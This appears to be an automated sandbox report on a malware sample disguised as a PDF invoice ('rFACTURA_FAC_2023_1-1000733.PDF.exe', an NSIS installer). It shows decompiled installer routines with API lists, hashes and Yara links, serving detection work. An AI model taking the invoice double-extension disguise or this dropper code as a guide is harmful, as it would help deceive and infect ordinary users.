API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060CC(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406639(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D98
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction ID: 13ce92619e22af03a8d5f803c99d3fa2c3d1cb872fac5522cbaad6f830247a1d
Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
Instruction Fuzzy Hash: 94116A32540509FBEF129F90CE09BEE7B69EF58350F110036B905B60E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7976d8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a30;
						if(_t2 >  *0x7a8a30) {
							_t3 = CreateDialogParamW( *0x7a8a20, 0x6f, 0, E00402DD7, 0);
							 *0x7976d8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406675(0);
					}
				} else {
					_t6 =  *0x7976d8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7976d8 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C38(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040625F(0x7a4728, _a4);
				_t21 = E00405BDB(0x7a4728);
				if(_t21 != 0) {
					E004064F3(_t21);
					if(( *0x7a8a3c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4728 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4728);
							_push(0x7a4728);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065A2();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B7C(0x7a4728);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B30();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c44
0x00405c4f
0x00405c53
0x00405c5a
0x00405c66
0x00405c76
0x00405c78
0x00405c90
0x00405c91
0x00405c98
0x00405c99
0x00000000
0x00000000
0x00405c7c
0x00405c83
0x00405c8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c83
0x00405c9b
0x00000000
0x00405caf
0x00405c68
0x00405c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c6e
0x00405c55
0x00000000

APIs

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C91
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00405CA1

Strings

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 00405C3E, 00405C43, 00405C49, 00405C8A, 00405C90, 00405C98, 00405CA0

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
API String ID: 3248276644-808641140
Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405237 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405237(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f0c != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f0c = _t16;
							E00404C0D();
						}
						L11:
						return CallWindowProcW( *0x7a1f14, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B8D(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404240(0x413);
				return 0;
			}

0x0040523b
0x00405245
0x00405261
0x00405283
0x00405286
0x0040528c
0x00405296
0x00405297
0x00405299
0x0040529f
0x0040529f
0x004052a9
0x00000000
0x004052b7
0x0040526e
0x004052a6
0x004052a6
0x00000000
0x004052a6
0x0040527a
0x0040527c
0x00000000
0x0040527c
0x0040524b
0x00000000
0x00000000
0x00405252
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405266
CallWindowProcW.USER32(?,?,?,?), ref: 004052B7

Part of subcall function 00404240: SendMessageW.USER32(00060020,00000000,00000000,00000000), ref: 00404252

Strings

, xrefs: 00405247

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
Instruction ID: 5e04443d83733b215e2c60cf409d87083b19ce8acf9f2344b17a5e906d0b9b78
Opcode Fuzzy Hash: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
Instruction Fuzzy Hash: E7017C31500608AFEF209F52DD81AAB3725EF95755F10407FFA00B61D0D73E9C919E69

Uniqueness

Uniqueness Score: -1.00%

Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79fee4; // 0xba1180
				_t3 = E004038BD(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						_t1 = _t6 + 8; // 0x10000000
						FreeLibrary( *_t1);
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79fee4 =  *0x79fee4 & 0x00000000;
				return _t3;
			}

0x004038d9
0x004038e1
0x004038e8
0x004038eb
0x004038eb
0x004038ed
0x004038ef
0x004038f2
0x004038f9
0x004038ff
0x00403903
0x00403904
0x0040390c

APIs

FreeLibrary.KERNEL32(10000000,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
GlobalFree.KERNEL32(00BA1180), ref: 004038F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B7C(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405b7d
0x00405b87
0x00405b8a
0x00405b90
0x00405b91
0x00405b92
0x00405b9a
0x00000000
0x00000000
0x00000000
0x00405b9a
0x00405b9c
0x00405ba4

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92

Strings

C:\Users\user\Desktop, xrefs: 00405B7C

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

